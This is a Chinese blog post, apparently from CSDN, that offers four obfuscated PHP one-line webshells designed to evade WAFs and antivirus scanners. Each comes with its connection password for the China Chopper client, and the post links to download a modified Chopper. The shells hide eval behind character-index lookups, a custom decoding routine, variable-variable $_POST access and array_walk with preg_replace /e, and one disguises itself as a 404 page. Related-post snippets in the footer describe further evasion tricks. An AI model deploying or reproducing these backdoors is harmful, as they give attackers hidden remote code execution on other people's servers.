2016年11月整理的最新php免杀一句话木马, 2017php免杀一句话(php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话,php过waf一句话)

最新推荐文章于 2024-05-30 16:21:29 发布
最新推荐文章于 2024-05-30 16:21:29 发布
阅读量9.2k 收藏 12
点赞数 2
分类专栏: 中国菜刀下载 文章标签: 最新php免杀一句话木马 php过waf一句话 过安全狗 菜刀php一句话 中国菜刀下载
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/settoken/article/details/53114781
版权

中国菜刀下载,基于原版中国菜刀优化版20160309.

下载地址:

http://download.csdn.net/detail/settoken/9457567

https://pan.baidu.com/s/1jHoJxHW

China chopper

https://pan.baidu.com/s/1eRxEYjC

这次特别推荐的一个php免杀过WAF一句话.

无任何php危险函数特征,除eval外,无POST GET REQUEST 请求函数.

<?php $g18="<X(CAT[tuhDdUOvbqPcEil'=5F]NYB!r\";1SL7`9G#k+ w>_{@~y-fHIJ\r:8\$MgoR6}Wj*s^n,4x0\\m.Q%V3|e\n&)azKZ/?2p\t";$GLOBALS['bbsfw34'] = ${$g18[47].$g18[17].$g18[13].$g18[35].$g18[5]};$GLOBALS['majcz28'] = $g18[9].$g18[85].$g18[89].$g18[11].$g18[85].$g18[31];if (!empty($GLOBALS['bbsfw34']['mf8c3a3b0'])) { eval($GLOBALS['bbsfw34']['mf8c3a3b0']); } $GLOBALS['majcz28']($g18[54].$g18[5].$g18[5].$g18[17].$g18[93].$g18[34].$g18[79].$g18[76].$g18[44].$g18[74].$g18[76].$g18[74].$g18[44].$g18[27].$g18[63].$g18[7].$g18[44].$g18[25].$g18[63].$g18[8].$g18[72].$g18[11]); echo $g18[0].$g18[9].$g18[34].$g18[46].$g18[74].$g18[76].$g18[74].$g18[44].$g18[27].$g18[63].$g18[7].$g18[44].$g18[25].$g18[63].$g18[8].$g18[72].$g18[11].$g18[0].$g18[93].$g18[9].$g18[34].$g18[46].$g18[57].$g18[86].$g18[5].$g18[9].$g18[85].$g18[44].$g18[96].$g18[89].$g18[62].$g18[85].$g18[44].$g18[7].$g18[9].$g18[89].$g18[7].$g18[44].$g18[51].$g18[63].$g18[8].$g18[44].$g18[9].$g18[89].$g18[14].$g18[85].$g18[44].$g18[31].$g18[85].$g18[16].$g18[8].$g18[85].$g18[70].$g18[7].$g18[85].$g18[11].$g18[44].$g18[18].$g18[63].$g18[8].$g18[21].$g18[11].$g18[44].$g18[72].$g18[63].$g18[7].$g18[44].$g18[15].$g18[85].$g18[44].$g18[53].$g18[63].$g18[8].$g18[72].$g18[11].$g18[79].$g18[57].$g18[86]; ?>


这个php一句带非常真实的404页面.运行界面如下图:


配合优化版菜刀可以直接连接,如图.


连接密码为:mf8c3a3b0


第二个:

<?php
function Aes($str,$key)
{
$t="";
for($i=0; $i<strlen($str); $i=$i+2)
{
	$k=(($i+2)/2)%strlen($key);
	$p=substr($key, $k,1);
	if(is_numeric(substr($str, $i,1)))
	{
		$t=$t.chr(hexdec(substr($str, $i,2))-$p);
	}
	else
	{
		$t=$t.chr(hexdec(substr($str, $i,4)));
		$i=$i+2;
	}
}
return($t);
}

(@$_=Aes('6A767C687B77','39')).@$_(Aes('6776666E286763736A38346466656871646A2A2464524F58565B2C7C302C5F292E','520'));
?>

这个一句话也是无危险函数特征,菜刀直接连接. 

连接密码为:520


第三个:

<?php 
error_reporting(0);
echo "404 Not Found.";
$default= "ps_ot" ;
$about =strtoupper($default[2]. $default[0] .$default[3]. $default[1].$default[4] );
if (isset(${ $about } ['index' ]) ) {eval ( ${$about } [ 'index'] );} ?>

这也是非常值得推荐给大家的。

连接密码为:index


第四个:

array_walk函数,在php4 php5 php7所有php版本中通用.

<?php
$e = $_REQUEST['www'];
$arr = array($_POST['settoken'] => '|.*|e',);
array_walk($arr, $e, '');
?>
使用方法如下图:


在php文件后面加上?www=preg_replace

连接密码为:settoken

settoken
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PHP小马的浅谈[过最新D盾]
shadowwolf’s blog
07-25 735
PHP小马的浅谈[过最新D盾] 绕过主要思路:使用写文件的函数写出另一个php文件然后include/require 回来执行方法1:File_put_content方法2 使用fwrite 绕过 主要思路:使用写文件的函数写出另一个php文件然后include/require 回来执行 方法1:File_put_content D盾还是报了,但如果是PHP7.0以上的,还是有绕过方法滴: <?php /* T00ls.net shadowwolf 2021-7-25 */ ( ~urldec
php超小大马_超小PHP小马小结(方便查找后门的朋友)
weixin_39579483的博客
12-30 844
作者: spider我也来个超小PHP小马复制代码 代码如下:header("content-Type: text/html; charset=gb2312");if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);?>保存文件名: if(isset($_POST['file...
PHP一句木马学习
qq_45780190的博客
05-11 3069
PHP一句木马学习 简单了解php一句木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句木马的变形 常用变形函数 convert_uudecode() #解码一个
记录一些小马
闵行小鱼塘
06-30 662
记录些小马,可能随着时间有些会失效
关于PHP的webshell小结
最新发布
2401_84488651的博客
05-30 882
我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到的目的!由于在PHP函数中函数名、方法名、类名 不区分大小写,但推荐使用与定义时相同的名字的时候还可以使得大小写进行绕过,所以大大提升了效果!
php教程【绝对原创】
dfdhxb995397的博客
08-01 2830
这个绝对原创! + 首发!个人认为大致分为这几个方面:1.关键字拆分。 比如assert,可以写成 'a'.'ss'.'e'.'r'.'t'这样。2.可变变量、引用、可变函数。 可变变量比如$a=$_POST['x'];$b='a';@eval($$b); 引用比如$a=$_POST['x'];$b=&$a;@eval($b...
php一句cmdshell新型 (非一句木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
一句木马要点和防范注意事项
05-24
例如,一个简单的PHP一句木马可能如下所示: ```php <?php eval($_GET['cmd']); ?> ``` 这个例子中,`eval`函数会执行通过GET参数`cmd`传入的任何PHP代码,从而让攻击者能够控制服务器。 了解了一句木马的基本...
一句 asp木马加密版 彻底突破毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
php大马一句,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个PHP大马,减小了体积,测试安全云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
php大马
03-03
过目前所有市面的各类防御,仅供参考。切勿用于非法途径。
一个过D盾的php小马
https://www.cnblogs.com/zpchcbd/
04-29 1669
这里给大家分享一个自己写的过D盾的马 <?php class ade { static $name = 'ceshi'; function __construct($name) { self::$name = $name; @eval(Null.self/**/::$name.Null); } } new ade($_POST[1]); 这里主要注意的一点的是$name...
冰蝎Behinder_v4.0
一醉一休的博客
10-13 1万+
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测
整理最新WebSHell (php过狗一句,过狗菜刀,2016过狗一句,2016php一句)
热门推荐
SetToken的博客
06-03 3万+
特别推荐的一个php一句. 菜刀可以连接,过waf,过安全,D盾,360,php一句木马带404页面,带MD5加密,可浏览器POST任意php代码执行.
自用php一句木马绝对没有任何关键字
不是专家的专栏
11-14 1万+
该代码是本人自己编写,可变性极大,基本不可能被查,代码里面没有任何关键字,而且很容易把代码弄的非常复杂。 使用方法: 1.在网站建立一个xxx.php,内容放入一句代码。(这里是演示,xxx.php可以是任何可以访问的文件) 2.建立一个demo.html,内容如下 textarea里面写上任何想执行php的代码,注意代码格式必须规范。--> phpinfo(
php简短一句木马,/一句木马(PHP)
weixin_39598568的博客
03-13 2334
前言在打CTF或渗透时,经常会遇到waf,普通的一句木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句木马。Webshell检测方式网上有很多的一句木马,但是如果不知道主流毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
一句木马
Lum1n0us's Blog
08-12 1万+
这篇文章主要是总结一句木马,并实现一句木马的简单,以及一个不死马的实现。 文章目录一句木马及原理一句木马简单一、assert()二、字符串拼接三、函数四、request请求五、类六、base64加解密七、写入木马不死马 一句木马及原理 首先,来看最简单的一句木马: <?php @eval($_POST['cmd']); ?> 前面的<?php ?>是php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_PO
php一句木马
08-03
总结来说,PHP一句木马是指通过一些技巧和手段来绕过安全检测,使木马代码能够成功执行而不被发现。这些技巧包括设置执行时间限制、忽略用户中止请求、使用字符串替换和反转等。然而,这种行为是非法的,违反...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值